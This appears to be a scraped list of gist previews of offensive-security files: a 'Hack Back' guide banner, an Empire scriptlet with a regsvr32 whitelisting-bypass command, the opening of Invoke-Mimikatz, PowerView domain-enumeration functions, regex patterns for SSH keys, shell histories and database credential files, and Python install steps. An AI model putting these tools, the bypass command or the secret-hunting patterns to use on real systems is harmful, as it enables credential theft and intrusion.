This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
_ _ _ ____ _ _ | |
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | |
| _ | (_| | (__| < | |_) | (_| | (__| <|_| | |
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) | |
A DIY Guide | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Empire" | |
progid="Empire" | |
version="1.00" | |
classid="{20001111-0000-0000-0000-0000FEEDACDC}" | |
> | |
<!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll --> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
========= ========== ===== ===== | |
========= ============ ====== ====== | |
=== === ==== ===== ===== | |
=== ========= ====== ====== INSTALLIN' THAT SWEET SWEET | |
=== ======== ============= BIG IRON ON YOUR LINUX LAPTOP | |
=== ========= ============= OR SERVER - BY MR. SKILLFULL | |
=== === ==== === === === | |
========= ============ ===== = ===== | |
========= ========== ===== ===== |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-Mimikatz | |
{ | |
[CmdletBinding(DefaultParameterSetName="DumpCreds")] | |
Param( | |
[Parameter(Position = 0)] | |
[String[]] | |
$ComputerName, | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-DomainSearcher { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('System.DirectoryServices.DirectorySearcher')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(ValueFromPipeline = $True)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$Domain, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-DomainSID { | |
param( | |
[String] | |
$Domain | |
) | |
$FoundDomain = Get-NetDomain -Domain $Domain | |
if($FoundDomain) { | |
$PrimaryDC = $FoundDomain.PdcRoleOwner |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
^.*_rsa$ | |
^.*_dsa$ | |
^.*_ed25519$ | |
^.*_ecdsa$ | |
\.?ssh/config$ | |
^key(pair)?$ | |
^\.?(bash_|zsh_|sh_|z)?history$ | |
^\.?mysql_history$ | |
^\.?psql_history$ | |
^\.?pgpass$ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
=== From deadsnakes repo === | |
sudo add-apt-repository ppa:deadsnakes/ppa | |
sudo apt update | |
sudo apt install python3.7 | |
sudo apt install python3-pip | |
sudo apt install python3.7-dev | |
=== OR compiling from source === | |
sudo apt update |